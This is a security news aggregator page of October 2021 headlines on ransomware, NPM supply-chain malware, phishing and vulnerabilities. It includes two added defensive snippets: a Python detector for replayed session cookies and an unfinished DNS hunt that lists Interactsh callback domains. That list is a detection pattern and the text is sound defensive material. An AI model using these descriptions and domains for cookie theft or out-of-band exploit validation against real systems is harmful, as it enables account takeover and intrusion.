Academics from universities developed a new attack technique, dubbed SmashEx, that targets Intel SGX and can allow adversaries to steal confidential data from Intel CPUs. The new vulnerability tracked by Intel as CVE-2021-0186 allows attackers to inject an asynchronous exception during the code ...Cyware Alerts - Hacker News
October 24, 2021 – Criminals
Threat actors offer for sale data of 50 million Moscow drivers Full Text
Abstract
Threat actors are offering for sale a database containing 50 million records belonging to Moscow drivers on a hacking forum for $800. Bad news for Russian drivers, threat actors are selling a database containing 50 million records belonging to Moscow...Security Affairs
October 24, 2021 – Attack
Phishing Campaign Targeting High-profile YouTubers Unmasked Full Text
Abstract
High-profile YouTube creators have been targeted with cookie-theft malware in phishing attacks, wherein hackers offered them fake collaboration opportunities. Google has identified around 15,000 actor accounts specifically created for this campaign. YouTube users are recommended to be aware of th ...Cyware Alerts - Hacker News
October 23, 2021 – Phishing
Microsoft Warns of TodayZoo Phishing Kit Used in Extensive Credential Stealing Attacks Full Text
Abstract
Microsoft on Thursday disclosed an "extensive series of credential phishing campaigns" that takes advantage of a custom phishing kit that stitched together components from at least five different widely circulated ones with the goal of siphoning user login information. The tech giant's Microsoft 365 Defender Threat Intelligence Team, which detected the first instances of the tool in the wild in December 2020, dubbed the copy-and-paste attack infrastructure "TodayZoo." "The abundance of phishing kits and other tools available for sale or rent makes it easy for a lone wolf attacker to pick and choose the best features from these kits," the researchers said. "They put these functionalities together in a customized kit and try to reap the benefits all to themselves. Such is the case of TodayZoo." Phishing kits, often sold as one-time payments in underground forums, are packaged archive files containing images, scripts, and HTML pages thatThe Hacker News
October 23, 2021 – Criminals
Feds Reportedly Hacked REvil Ransomware Group and Forced it Offline Full Text
Abstract
The Russian-led REvil ransomware gang was felled by an active multi-country law enforcement operation that resulted in its infrastructure being hacked and taken offline for a second time earlier this week, in what's the latest action taken by governments to disrupt the lucrative ecosystem. The takedown was first reported by Reuters, quoting multiple private-sector cyber experts working with the U.S. government, noting that the May cyber attack on Colonial Pipeline relied on encryption software developed by REvil associates, officially corroborating DarkSide's connections to the prolific criminal outfit. Coinciding with the development, blockchain analytics firm Elliptic disclosed that $7 million in bitcoin held by the DarkSide ransomware group was moved through a series of new wallets, with a small fraction of the amount being transferred with each transfer to make the laundered money more difficult to track and convert the funds into fiat currency throughThe Hacker News
October 23, 2021 – Breach
Popular NPM library hijacked to install password-stealers, miners Full Text
Abstract
Hackers hijacked the popular UA-Parser-JS NPM library, with millions of downloads a week, to infect Linux and Windows devices with cryptominers and password-stealing trojans in a supply-chain attack.BleepingComputer
October 23, 2021 – Criminals
Hacker sells the data for millions of Moscow drivers for $800 Full Text
Abstract
Hackers are selling a stolen database containing 50 million records of Moscow driver data on an underground forum for only $800.BleepingComputer
October 23, 2021 – Privacy
FTC: ISPs collect and monetize far more user data than you’d think Full Text
Abstract
The Federal Trade Commission (FTC) found that the six largest internet service providers (ISPs) in the U.S. collect and share customers' personal data without providing them with info on how it's used or meaningful ways to control this process.BleepingComputer
October 23, 2021 – Vulnerabilities
Cisco SD-WAN flaw could lead to arbitrary code execution, patch it now! Full Text
Abstract
Cisco fixes an OS command-injection flaw, tracked as CVE-2021-1529, in Cisco SD-WAN that could allow privilege escalation and lead to arbitrary code execution. Cisco addressed a high-severity OS command-injection vulnerability, tracked as CVE-2021-1529,...Security Affairs
October 23, 2021 – Criminals
Ransomware hackers nervous, allege harassment from U.S. Full Text
Abstract
Several ransomware gangs posted lengthy anti-U.S. screeds. They appear prompted by the news that the FBI had successfully hacked and taken down another major ransomware group called REvil.NBC News
October 23, 2021 – Criminals
After Nation-State Hackers, Cybercriminals Also Add Sliver Pentest Tool to Arsenal Full Text
Abstract
The cybercriminal group tracked as TA551 recently showed a significant change in tactics with the addition of the open-source pentest tool Sliver to its arsenal, according to cybersecurity firm Proofpoint.Security Week
October 23, 2021 – Malware
Malicious Packages Disguised as JavaScript Libraries Found Full Text
Abstract
Researchers at open-source software firm Sonatype have uncovered multiple malicious packages that disguise themselves as legitimate JavaScript libraries on npm registries to launch cryptominers on Windows, macOS and Linux machines.Gov Info Security
October 22, 2021 – Ransomware
The Week in Ransomware - October 22nd 2021 - Striking back Full Text
Abstract
Between law enforcement operations, REvil's second shutdown, and ransomware gangs' response to the hacking of their servers, it has been quite the week.BleepingComputer
October 22, 2021 – Government
Top officials turn over Twitter accounts to ‘share the mic’ with Black cybersecurity experts Full Text
Abstract
Top federal officials and cybersecurity experts participated Friday in an online campaign to “share the mic” in cyber, giving control of their Twitter accounts to Black cybersecurity officials and experts in an effort to combat systemic racism.The Hill
October 22, 2021 – General
A Hypothetical Command Vision Statement for a Fictional PLA Cyber Command Full Text
Abstract
What would be the impact of other cyber powers adopting U.S. Cyber Command’s Command Vision concepts in pursuing their own security interests?Lawfare
October 22, 2021 – Vulnerabilities
Facebook SSRF Dashboard allows hunting SSRF vulnerabilities Full Text
Abstract
Facebook developed a new tool that allows security experts to look for Server-Side Request Forgery (SSRF) vulnerabilities in their software. Facebook announced that it has designed a new tool, named SSRF Dashboard, that allows security researchers to search...Security Affairs
October 22, 2021 – Breach
SCUF Gaming store hacked to steal credit card info of 32,000 customers Full Text
Abstract
SCUF Gaming International, a leading manufacturer of custom PC and console controllers, is notifying customers that its website was hacked in February to plant a malicious script used to steal their credit card information.BleepingComputer
October 22, 2021 – Breach
Popular NPM Package Hijacked to Publish Crypto-mining Malware Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency on Friday warned of crypto-mining malware embedded in "UAParser.js," a popular JavaScript NPM library with over 6 million weekly downloads, days after the NPM repository moved to get rid of three rogue packages that were found to mimic the same library. The supply-chain attack targeting the open-source library saw three different versions — 0.7.29, 0.8.0, 1.0.0 — that were published with malicious code on Thursday following a successful takeover of the maintainer's NPM account. "I believe someone was hijacking my NPM account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware," UAParser.js's developer Faisal Salman said. The issue has been patched in versions 0.7.30, 0.8.1, and 1.0.1. The development comes days after DevSecOps firm Sonatype disclosed details of three packages — okhsa, klow, and klown — that masqueraded as the user-agent striThe Hacker News
October 22, 2021 – Criminals
Groove ransomware group calls on other ransomware gangs to hit US public sector Full Text
Abstract
Groove ransomware operators call on other ransomware groups to stop competing and join forces to fight against the US. The Groove ransomware gang is calling on other ransomware groups to attack the US public sector after a law enforcement operation...Security Affairs
October 22, 2021 – Ransomware
DarkSide ransomware rushes to cash out $7 million in Bitcoin Full Text
Abstract
Almost $7 million worth of Bitcoin in a wallet controlled by DarkSide ransomware operators has been moved in what looks like a money laundering rollercoaster.BleepingComputer
October 22, 2021 – Attack
‘Lone Wolf’ Hacker Group Targeting Afghanistan and India with Commodity RATs Full Text
Abstract
A new malware campaign targeting Afghanistan and India is exploiting a now-patched, 20-year-old flaw affecting Microsoft Office to deploy an array of commodity remote access trojans (RATs) that allow the adversary to gain complete control over the compromised endpoints. Cisco Talos attributed the cyber campaign to a "lone wolf" threat actor operating a Lahore-based fake IT company called Bunse Technologies as a front to carry out the malicious activities, while also having a history of sharing content that's in favor of Pakistan and the Taliban dating all the way back to 2016. The attacks work by taking advantage of political and government-themed lure domains that host the malware payloads, with the infection chains leveraging weaponized RTF documents and PowerShell scripts that distribute malware to victims. Specifically, the laced RTF files were found exploiting CVE-2017-11882 to execute a PowerShell command that's responsible for deploying additional malware toThe Hacker News
October 22, 2021 – Criminals
DarkSide ransomware operators move 6.8M worth of Bitcoin after REvil shutdown Full Text
Abstract
Darkside and BlackMatter ransomware operators have moved a large amount of their Bitcoin reserves after the recent shutdown of REvil's infrastructure. The gangs behind the Darkside and BlackMatter ransomware operations have moved 107 BTC ($6.8 million)...Security Affairs
October 22, 2021 – Criminals
Groove ransomware calls on all extortion gangs to attack US interests Full Text
Abstract
The Groove ransomware gang is calling on other extortion groups to attack US interests after law enforcement took down REvil's infrastructure last week.BleepingComputer
October 22, 2021 – Phishing
This monster of a phishing campaign is after your passwords Full Text
Abstract
Microsoft has detailed an unusual phishing campaign aimed at stealing passwords that uses the ZooToday phishing kit built using pieces of code copied from other hackers' work.ZDNet
October 22, 2021 – Hacker
Hackers Set Up Fake Company to Get IT Experts to Launch Ransomware Attacks Full Text
Abstract
The financially motivated FIN7 cybercrime gang has masqueraded as yet another fictitious cybersecurity company called "Bastion Secure" to recruit unwitting software engineers under the guise of penetration testing in a likely lead-up to a ransomware scheme. "With FIN7's latest fake company, the criminal group leveraged true, publicly available information from various legitimate cybersecurity companies to create a thin veil of legitimacy around Bastion Secure," Recorded Future's Gemini Advisory unit said in a report. "FIN7 is adopting disinformation tactics so that if a potential hire or interested party were to fact check Bastion Secure, then a cursory search on Google would return 'true' information for companies with a similar name or industry to FIN7's Bastion Secure." FIN7, also known as Carbanak, Carbon Spider, and Anunak, has a track record of striking restaurant, gambling, and hospitality industries in the U.S. to infectThe Hacker News
October 22, 2021 – Criminals
FIN7 cybercrime gang creates fake cybersecurity firm to recruit pentesters for ransomware attacks Full Text
Abstract
FIN7 hacking group created fake cybersecurity companies to hire experts and involve them in ransomware attacks by tricking them into believing they are conducting a pentest. The FIN7 hacking group is attempting to enter the ransomware business and is doing it with an interesting...Security Affairs
October 22, 2021 – Malware
Microsoft: WizardUpdate Mac malware adds new evasion tactics Full Text
Abstract
Microsoft says it found new variants of macOS malware known as WizardUpdate (also tracked as UpdateAgent or Vigram), updated to use new evasion and persistence tactics.BleepingComputer
October 22, 2021 – Attack
Swiss exhibitions organizer MCH Group hit by cyberattack Full Text
Abstract
Swiss events organizer and marketing company MCH Group was hit by a malware attack on Wednesday (October 20). The firm says it is working to get systems up and running again.The Daily Swig
October 22, 2021 – Malware
Researchers Discover Microsoft-Signed FiveSys Rootkit in the Wild Full Text
Abstract
A newly identified rootkit has been found with a valid digital signature issued by Microsoft that's used to proxy traffic to internet addresses of interest to the attackers for over a year targeting online gamers in China. Bucharest-headquartered cybersecurity technology company Bitdefender named the malware "FiveSys," calling out its possible credential theft and in-game-purchase hijacking motives. The Windows maker has since revoked the signature following responsible disclosure. "Digital signatures are a way of establishing trust," Bitdefender researchers said in a white paper, adding "a valid digital signature helps the attacker navigate around the operating system's restrictions on loading third-party modules into the kernel. Once loaded, the rootkit allows its creators to gain virtually unlimited privileges." Rootkits are both evasive and stealthy as they offer threat actors an entrenched foothold onto victims' systems and concealThe Hacker News
October 22, 2021 – Malware
FiveSys, a new digitally-signed rootkit spotted by Bitdefender experts Full Text
Abstract
Bitdefender researchers discovered a new rootkit named FiveSys that abuses a Microsoft-issued digital signature to evade detection. FiveSys is a new rootkit discovered by researchers from Bitdefender, it is able to evade detection by abusing...Security Affairs
October 22, 2021 – Breach
Italian celebs’ data exposed in ransomware attack on SIAE Full Text
Abstract
The Italian data protection authority Garante per la Protezione dei Dati Personali (GPDP) has announced an investigation into a data breach of the country's copyright protection agency.BleepingComputer
October 22, 2021 – Criminals
DarkSide Ransomware Gang Moves Bitcoin Reserves After REvil Got Hit by Law Enforcement Action Full Text
Abstract
The operators of the Darkside and BlackMatter ransomware strains have moved a large chunk of their Bitcoin reserves after news broke that REvil was hit by a law enforcement takedown.The Record
October 22, 2021 – Solution
Microsoft Teams adds end-to-end encryption for one-to-one calls Full Text
Abstract
Microsoft has announced the public preview roll-out of end-to-end encryption (E2EE) support for one-to-one Microsoft Teams calls.BleepingComputer
October 22, 2021 – Business
Turkish cybersecurity venture raises $24M to accelerate expansion Full Text
Abstract
This latest round takes the total funding Picus has received to $33 million. The company plans to use the funds to help accelerate its expansion in EMEA and APAC countries.Daily Sabah
October 22, 2021 – Privacy
Microsoft Teams adds end-to-end encryption for one-to-one calls Full Text
Abstract
Microsoft has announced the public preview roll-out of end-to-end encryption (E2EE) support for one-to-one Microsoft Teams calls.BleepingComputer
October 21, 2021 – Ransomware
TA551 Shifts Tactics to Install Sliver Red-Teaming Tool Full Text
Abstract
A new email campaign from the threat group uses the attack-simulation framework in a likely lead-up to ransomware deployment.Threatpost
October 21, 2021 – Attack
Gigabyte Allegedly Hit by AvosLocker Ransomware Full Text
Abstract
If AvosLocker stole Gigabyte’s master keys, threat actors could force hardware to download fake drivers or BIOS updates in a supply-chain attack a la SolarWinds.Threatpost
October 21, 2021 – General
Why is Cybersecurity Failing Against Ransomware? Full Text
Abstract
Hardly a week goes by without another major company falling victim to a ransomware attack. Nate Warfield, CTO at Prevailion, discusses the immense challenges in changing that status quo.Threatpost
October 21, 2021 – Attack
Massive campaign uses YouTube to push password-stealing malware Full Text
Abstract
Widespread malware campaigns are creating YouTube videos to distribute password-stealing trojans to unsuspecting viewers.BleepingComputer
October 21, 2021 – Criminals
Cybercriminals Exploit the Discord CDN to Deliver 27 Unique Types of Malware Full Text
Abstract
Discord, a popular VoIP, instant messaging, and digital distribution platform used by 140 million people in 2021, is being abused by cybercriminals to deploy malware files.Risk IQ
October 21, 2021 – Criminals
US, allied nations force REvil ransomware group offline: report Full Text
Abstract
The United States and other nations earlier this week in a joint operation hacked and forced offline the REvil cyber criminal group, which has been linked to several major ransomware attacks this year.The Hill
October 21, 2021 – Education
Before and After a Pen Test: Steps to Get Through It Full Text
Abstract
An effective cybersecurity strategy can be challenging to implement correctly and often involves many layers of security. Part of a robust security strategy involves performing what is known as a penetration test (pen test). The penetration test helps to discover vulnerabilities and weaknesses in your security defenses before the bad guys discover them. They can also help validate remedial efforts and solutions put in place to overcome previously discovered security vulnerabilities. Let's look more closely at the pen test. What is included in a penetration test? How are they performed, and by whom? What steps should be taken after a penetration test? What is a penetration test? 1 — Simulated cyberattack A penetration test is, for all practical purposes, a simulated cyberattack on your business. However, it is carried out by the "good guys." An outside resource often conducts a penetration test, whether a third-party security consulting company or another security entity. SecuritThe Hacker News
October 21, 2021 – Ransomware
Evil Corp rebrands their ransomware, this time it is Macaw Locker Full Text
Abstract
Evil Corp cybercrime gang is using a new ransomware called Macaw Locker to evade US sanctions that prevent victims from paying the ransom. Evil Corp has launched a new ransomware called Macaw Locker to evade US sanctions that prevent victims from...Security Affairs
October 21, 2021 – General
U.S. Ban on Sales of Cyberattack Tools Is Anemic, Experts Warn Full Text
Abstract
Meanwhile, Zerodium’s quest to buy VPN exploits is problematic, researchers said.Threatpost
October 21, 2021 – Attack
Evil Corp demands $40 million in new Macaw ransomware attacks Full Text
Abstract
Evil Corp has launched a new ransomware called Macaw Locker to evade US sanctions that prevent victims from making ransom payments.BleepingComputer
October 21, 2021 – Business
INE Acquires Pentester Academy to Enhance Comprehensive IT Training Solutions Full Text
Abstract
INE has acquired Pentester Academy to accelerate the creation of more challenging, scenario-based training tools across Cyber Security, Networking, Data Science, Cloud, and DevOps.Globe News Wire
October 21, 2021 – Government
New Senate bill would take steps to protect AI-collected data Full Text
Abstract
A new bipartisan Senate bill introduced Thursday is aiming to secure data collected by artificial intelligence technologies, such as facial recognition technologies, as these types of technologies continue to grow in use.The Hill
October 21, 2021 – Vulnerabilities
Bug in Popular WinRAR Software Could Let Attackers Hack Your Computer Full Text
Abstract
A new security weakness has been disclosed in the WinRAR trialware file archiver utility for Windows that could be abused by a remote attacker to execute arbitrary code on targeted systems, underscoring how vulnerabilities in such software could become a gateway for a roster of attacks. Tracked as CVE-2021-35052, the bug impacts the trial version of the software running version 5.70. "This vulnerability allows an attacker to intercept and modify requests sent to the user of the application," Positive Technologies' Igor Sak-Sakovskiy said in a technical write-up. "This can be used to achieve remote code execution (RCE) on a victim's computer." Sak-Sakovskiy noted that investigation into WinRAR began after observing a JavaScript error rendered by MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents, leading to the discovThe Hacker News
October 21, 2021 – Vulnerabilities
A flaw in WinRAR could lead to remote code execution Full Text
Abstract
A vulnerability in WinRAR, a trialware file archiver utility for Windows, could be exploited by a remote attacker to hack a system. Positive Technologies researcher Igor Sak-Sakovskiy discovered a remote code execution vulnerability, tracked...Security Affairs
October 21, 2021 – Breach
Ransomware Sinks Teeth into Candy-Corn Maker Ahead of Halloween Full Text
Abstract
Chicago-based Ferrara acknowledged an Oct. 9 attack that encrypted some systems and disrupted production.Threatpost
October 21, 2021 – General
Microsoft now defends nonprofits against nation-state attacks Full Text
Abstract
Microsoft announced today a new security program for nonprofits to provide them with protection against nation-state attacks, which have increasingly been targeting them in recent years.BleepingComputer
October 21, 2021 – Vulnerabilities
Historic scientific notation bug foils WAF defenses Full Text
Abstract
Security researchers have discovered that a historic vulnerability affecting both MySQL and MariaDB databases caused serious flaws for security technologies from Amazon Web Services.The Daily Swig
October 21, 2021 – Hacker
Hacking group tied to Colonial Pipeline attack continuing to recruit tech talent Full Text
Abstract
A hacking group linked to the ransomware attack on Colonial Pipeline earlier this year is posing as a fake company to recruit individuals to help carry out further attacks, according to a report published Thursday.The Hill
October 21, 2021 – Solution
Product Overview: Cynet SaaS Security Posture Management (SSPM) Full Text
Abstract
Software-as-a-service (SaaS) applications have gone from novelty to business necessity in a few short years, and their positive impact on organizations is clear. It's safe to say that most industries today run on SaaS applications, which is undoubtedly positive, but it does introduce some critical new challenges to organizations. As SaaS application use expands, as well as the number of touchpoints they create, the attack surface also becomes significantly larger. As an answer to this emerging challenge, XDR provider Cynet has added a new SaaS Security Posture Management (SSPM) tool to its existing platform. Regardless of the size of an organization or its security team, managing the security policy and posture of dozens to hundreds of SaaS applications is a complex task, and one that requires the right tools to expedite and optimize. Using SSPM can centralize many of the management and logistics requirements and offer a more unified way to establish securThe Hacker News
October 21, 2021 – Policy and Law
Administrators of bulletproof hosting sentenced to prison in the US Full Text
Abstract
The United States Department of Justice sentenced two individuals that were providing bulletproof hosting to various malware operations. The United States Department of Justice sentenced to prison two individuals involved in providing bulletproof...Security Affairs
October 21, 2021 – Criminals
Hacking gang creates fake firm to hire pentesters for ransomware attacks Full Text
Abstract
The FIN7 hacking group is attempting to join the highly profitable ransomware space by creating fake cybersecurity companies that conduct network attacks under the guise of pentesting.BleepingComputer
October 21, 2021 – Business
Plurilock to Acquire Assets of CloudCodes Software, Award Winning Cloud Security Provider Full Text
Abstract
Plurilock has entered into definitive agreements dated October 21, 2021, to acquire certain assets of CloudCodes Software Private Limited, a cloud access security broker based in India.Yahoo! Finance
October 21, 2021 – Cryptocurrency
Malicious NPM Packages Caught Running Cryptominer On Windows, Linux, macOS Devices Full Text
Abstract
Three JavaScript libraries uploaded to the official NPM package repository have been unmasked as crypto-mining malware, once again demonstrating how open-source software package repositories are becoming a lucrative target for executing an array of attacks on Windows, macOS, and Linux systems. The malicious packages in question, named okhsa, klow, and klown, were published by the same developer and falsely claimed to be JavaScript-based user-agent string parsers designed to extract hardware specifics from the "User-Agent" HTTP header. But unbeknownst to the victims who imported them, the author hid cryptocurrency mining malware inside the libraries. The bad actor's NPM account has since been deactivated, and all three libraries, which were downloaded 112, 4, and 65 times respectively, have been removed from the repository as of October 15, 2021. Attacks involving the three libraries worked by detecting the current operating system, before proceeThe Hacker News
October 21, 2021 – Government
US Bureau of Industry and Security bans export of hacking tools to authoritarian regimes Full Text
Abstract
The Commerce Department's Bureau of Industry and Security (BIS) would ban U.S. firms from selling hacking tools to authoritarian regimes. The Commerce Department's Bureau of Industry and Security (BIS) would introduce a new export control rule aimed...Security Affairs
October 21, 2021 – Vulnerabilities
Google launches Android Enterprise bug bounty program Full Text
Abstract
Google has announced the launch of its first vulnerability rewards program for Android Enterprise with bounties of up to $250,000.BleepingComputer
October 21, 2021 – Policy and Law
US judge sentences duo for roles in running bulletproof hosting service Full Text
Abstract
The duo were accused of providing online hosting services that are known as bulletproof -- a popular option for cybercriminals who need a host that will turn a blind eye to criminal activity.ZDNet
October 21, 2021 – Government
U.S. Government Bans Sale of Hacking Tools to Authoritarian Regimes Full Text
Abstract
The U.S. Commerce Department on Wednesday announced new rules barring the sale of hacking software and equipment to authoritarian regimes, where it could potentially facilitate human rights abuse, for national security (NS) and anti-terrorism (AT) reasons. The mandate, which is set to go into effect in 90 days, will forbid the export, reexport and transfer of "cybersecurity items" to countries of "national security or weapons of mass destruction concern" such as China and Russia without a license from the department's Bureau of Industry and Security (BIS). "The United States Government opposes the misuse of technology to abuse human rights or conduct other malicious cyber activities, and these new rules will help ensure that U.S. companies are not fueling authoritarian practices," BIS said in a press release. The rule does not cover "intrusion software" itself, but rather the following — Systems, equipment, and components specially designed orThe Hacker News
October 21, 2021 – General
Top 5 Attack Vectors to Look Out For in 2022 Full Text
Abstract
Threat actors are continually looking for better ways to target organizations, here are the top five attack vectors to look out for in 2022. Malicious actors are continually looking for better ways to carry out successful cyber attacks. Whether motivated...Security Affairs
October 21, 2021 – Criminals
Cybercrime matures as hackers are forced to work smarter Full Text
Abstract
An analysis of 500 hacking incidents across a wide range of industries has revealed trends that characterize a maturity in the way hacking groups operate today.BleepingComputer
October 21, 2021 – Cryptocurrency
Cryptomining Malware Found Hidden Inside Three Libraries on Official NPM Package Repository Full Text
Abstract
The names of the three npm packages were klow, klown, and okhsa. The packages were live only for a day, on October 15. The final payloads (cryptominers) could be run on Windows or Linux platforms.The Record
October 21, 2021 – Hacker
Hackers Stealing Browser Cookies to Hijack High-Profile YouTube Accounts Full Text
Abstract
Since at least late 2019, a network of hackers-for-hire has been hijacking the channels of YouTube creators, luring them with bogus collaboration opportunities to broadcast cryptocurrency scams or sell the accounts to the highest bidder. That's according to a new report published by Google's Threat Analysis Group (TAG), which said it disrupted financially motivated phishing campaigns targeting the video platform with cookie theft malware. The actors behind the infiltration have been attributed to a group of hackers recruited in a Russian-speaking forum. "Cookie Theft, also known as 'pass-the-cookie attack,' is a session hijacking technique that enables access to user accounts with session cookies stored in the browser," TAG's Ashley Shen said. "While the technique has been around for decades, its resurgence as a top security risk could be due to a wider adoption of multi-factor authentication (MFA) making it difficult to conduct abuse, and shifThe Hacker News
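A stolen session cookie is valid wherever it is replayed, so the server-side signal is the cookie itself turning up from a client that does not match the one it was issued to. The following detection logic is an added example (not TAG's or The Hacker News' code) that runs over constructed session log lines of the assumed form "timestamp session-id client-ip user-agent" and flags a session when its User-Agent changes or it moves to a different /16 network; the tolerance for same-network address churn and the log format are assumptions.

```python
import ipaddress
from collections import namedtuple

# Constructed server-side session log (not real data):
# "<timestamp> <session-id> <client-ip> <user-agent...>"
SAMPLE_LOG = """\
2021-10-20T09:00:01Z sid-a1 203.0.113.10 Mozilla/5.0 (Windows NT 10.0) Chrome/94.0
2021-10-20T09:05:12Z sid-a1 203.0.113.10 Mozilla/5.0 (Windows NT 10.0) Chrome/94.0
2021-10-20T09:07:45Z sid-a1 198.51.100.77 Mozilla/5.0 (X11; Linux x86_64) Firefox/93.0
2021-10-20T09:10:00Z sid-b2 192.0.2.5 Mozilla/5.0 (Macintosh) Safari/605.1.15
2021-10-20T09:20:00Z sid-b2 192.0.2.9 Mozilla/5.0 (Macintosh) Safari/605.1.15
"""

Sighting = namedtuple("Sighting", "ts sid ip ua")


def parse_log(text):
    """Parse the assumed log format; the User-Agent is the free-text tail."""
    sightings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, ip, ua = line.split(maxsplit=3)
        sightings.append(Sighting(ts, sid, ipaddress.ip_address(ip), ua))
    return sightings


def same_network(a, b, prefix=16):
    """IPv4 only: compare the leading `prefix` bits to tolerate DHCP/NAT churn."""
    shift = 32 - prefix
    return int(a) >> shift == int(b) >> shift


def detect_pass_the_cookie(sightings, prefix=16):
    """Flag session IDs later presented by a client that does not look like the
    one the session was first seen with. Returns {session_id: [reasons]}."""
    first_seen, alerts = {}, {}
    for s in sightings:
        origin = first_seen.setdefault(s.sid, s)
        if origin is s:
            continue  # the first sighting defines the baseline for that session
        reasons = set()
        if s.ua != origin.ua:
            reasons.add("user-agent changed")
        if not same_network(origin.ip, s.ip, prefix):
            reasons.add("client network changed")
        if reasons:
            alerts.setdefault(s.sid, set()).update(reasons)
    return {sid: sorted(r) for sid, r in alerts.items()}


if __name__ == "__main__":
    for sid, reasons in detect_pass_the_cookie(parse_log(SAMPLE_LOG)).items():
        print(f"{sid}: possible session hijack ({', '.join(reasons)})")
```

In the sample, sid-a1 is flagged on both signals while sid-b2, which only moves within its own /16, is not. This is detection after the fact; it does not stop the replay. Short session lifetimes, re-authentication before sensitive actions, and binding the session to device-bound credentials reduce what a stolen cookie is worth, which is the gap MFA alone leaves open.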
October 21, 2021 – Malware
RAT malware spreading in Korea through webhards and torrents Full Text
Abstract
An ongoing malware distribution campaign targeting South Korea is disguising RATs (remote access trojans) as an adult game shared via webhards and torrents.BleepingComputer
October 21, 2021 – General
Siloed security data hamper the ability to achieve collective defense Full Text
Abstract
In a new Cyware study, conducted by Forrester, 64% of respondents noted that sharing cyber threat intelligence between their organizations’ SOC, incident response, and threat intel teams is limited.Help Net Security
October 21, 2021 – Policy and Law
Nine arrested for impersonating bank clerks to steal from the elderly Full Text
Abstract
The Dutch Police have arrested nine people for targeting and stealing money from the elderly by impersonating bank employees.BleepingComputer
October 21, 2021 – Criminals
Bulletproof hosting admins sentenced for helping cybercrime gangs Full Text
Abstract
Two Eastern European men were sentenced to prison on Racketeer Influenced and Corrupt Organizations (RICO) charges for bulletproof hosting services used by multiple cybercrime operations to target US organizations.BleepingComputer
October 20, 2021 – Hacker
Google Crushes YouTube Cookie-Stealing Channel Hijackers Full Text
Abstract
Google has caught and brushed off a bunch of cookie-stealing YouTube channel hijackers who were running cryptocurrency scams on, or auctioning off, ripped-off channels.Threatpost
October 20, 2021 – APT
Geriatric Microsoft Bug Exploited by APT Using Commodity RATs Full Text
Abstract
Disguised as an IT firm, the APT is hitting targets in Afghanistan & India, exploiting a 20-year-old+ Microsoft Office bug that’s as potent as it is ancient.Threatpost
October 20, 2021 – Criminals
Two Eastern Europeans Sentenced for Providing Bulletproof Hosting to Cyber Criminals Full Text
Abstract
Two Eastern European nationals have been sentenced in the U.S. for offering "bulletproof hosting" services to cybercriminals, who used the technical infrastructure to distribute malware and attack financial institutions across the country between 2009 and 2015. Pavel Stassi, 30, of Estonia, and Aleksandr Shorodumov, 33, of Lithuania, have been sentenced to 24 months and 48 months in prison, respectively, for their roles in the scheme. The development comes months after Stassi and Shorodumov, along with Aleksandr Grichishkin and Andrei Skvortsov of Russia, pleaded guilty to Racketeer Influenced and Corrupt Organizations (RICO) charges earlier this May. The U.S. Justice Department (DoJ) said the other two co-defendants, Grichishkin and Skvortsov, are pending sentencing and face a maximum penalty of 20 years in prison. Court documents showed that both individuals worked as administrators for an unnamed bulletproof hosting service provider that rented out IP addresses,The Hacker News
October 20, 2021 – Government
US govt to ban export of hacking tools to authoritarian regimes Full Text
Abstract
The Commerce Department's Bureau of Industry and Security (BIS) today announced export controls for software and hardware tools that could be used for malicious hacking activities.BleepingComputer
October 20, 2021 – Vulnerabilities
Oracle’s October 2021 CPU Includes 419 Security Patches Full Text
Abstract
Oracle on Tuesday announced the release of its latest quarterly Critical Patch Update (CPU), which includes a total of 419 security patches for vulnerabilities across the company’s portfolio.Security Week
October 20, 2021 – Government
House approves bill to strengthen IT supply chain following SolarWinds hack Full Text
Abstract
The House on Wednesday approved legislation to strengthen software and information technology supply chains at the Department of Homeland Security (DHS) and to help protect against attacks similar to last year’s SolarWinds hack.The Hill
October 20, 2021 – Hacker
Researchers Break Intel SGX With New ‘SmashEx’ CPU Attack Technique Full Text
Abstract
A newly disclosed vulnerability affecting Intel processors could be abused by an adversary to gain access to sensitive information stored within enclaves and even run arbitrary code on vulnerable systems. The vulnerability (CVE-2021-0186, CVSS score: 8.2) was discovered by a group of academics from ETH Zurich, the National University of Singapore, and the Chinese National University of Defense Technology in early May 2021, who used it to stage a confidential data disclosure attack called "SmashEx" that can corrupt private data housed in the enclave and break its integrity. Introduced with Intel's Skylake processors, SGX (short for Software Guard eXtensions) allows developers to run selected application modules in a completely isolated secure compartment of memory, called an enclave or a Trusted Execution Environment (TEE), which is designed to be protected from processes running at higher privilege levels like the operating system. SGX ensures that data is secureThe Hacker News
October 20, 2021 – Breach
YouTube creators’ accounts hijacked with cookie-stealing malware Full Text
Abstract
A Cookie Theft malware was employed in phishing attacks against YouTube creators, Google's Threat Analysis Group (TAG) warns. Financially motivated threat actors are using Cookie Theft malware in phishing attacks against YouTube creators since late...Security Affairs
October 20, 2021 – Phishing
Employees Make Best Frontline Phishing Defense Full Text
Abstract
October is Cybersecurity Awareness Month. Make empowering workers to detect and thwart inbox attacks a priority with Trend Micro Phish Insight.Threatpost
October 20, 2021 – Denial Of Service
DDoS attacks against Russian firms have almost tripled in 2021 Full Text
Abstract
A report analyzing data from the start of the year concludes that distributed denial-of-service (DDoS) attacks on Russian companies have increased 2.5 times compared to the same period last year.BleepingComputer
October 20, 2021 – Criminals
Cybercriminals Use Interactsh Tool for Vulnerability Validation Full Text
Abstract
Unit 42 discovered hackers exploiting an open-source service called Interactsh; the tool generates desired domain names to help users test whether an exploit is successful. The tool allows anyone to generate specific URLs for testing on HTTP attempts and DNS queries, which help them test whet ...Cyware Alerts - Hacker News
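Because an Interactsh payload only "fires" when the target itself resolves the attacker's unique subdomain, the defender's best telemetry is the internal resolver log: the client making the lookup is the asset that processed the payload. The hunt below is an added example (not Unit 42's or the Cyware item's code). It runs over constructed resolver log lines of the assumed form "timestamp client-ip qname qtype" and reports which internal hosts resolved names under a list of out-of-band apex domains. The apex list is an assumption taken from the public Interactsh servers as the project documented them at the time of writing; verify it, and add any self-hosted instance, before relying on it.

```python
from collections import defaultdict

# Apex domains of the public Interactsh servers (assumed from the project's
# documented defaults; verify before deploying and add self-hosted instances).
OOB_APEXES = {
    "interact.sh", "oast.pro", "oast.live", "oast.site",
    "oast.online", "oast.fun", "oast.me",
}

# Constructed resolver log sample, not real traffic:
# "<timestamp> <internal-client-ip> <qname> <qtype>"
SAMPLE_DNS_LOG = """\
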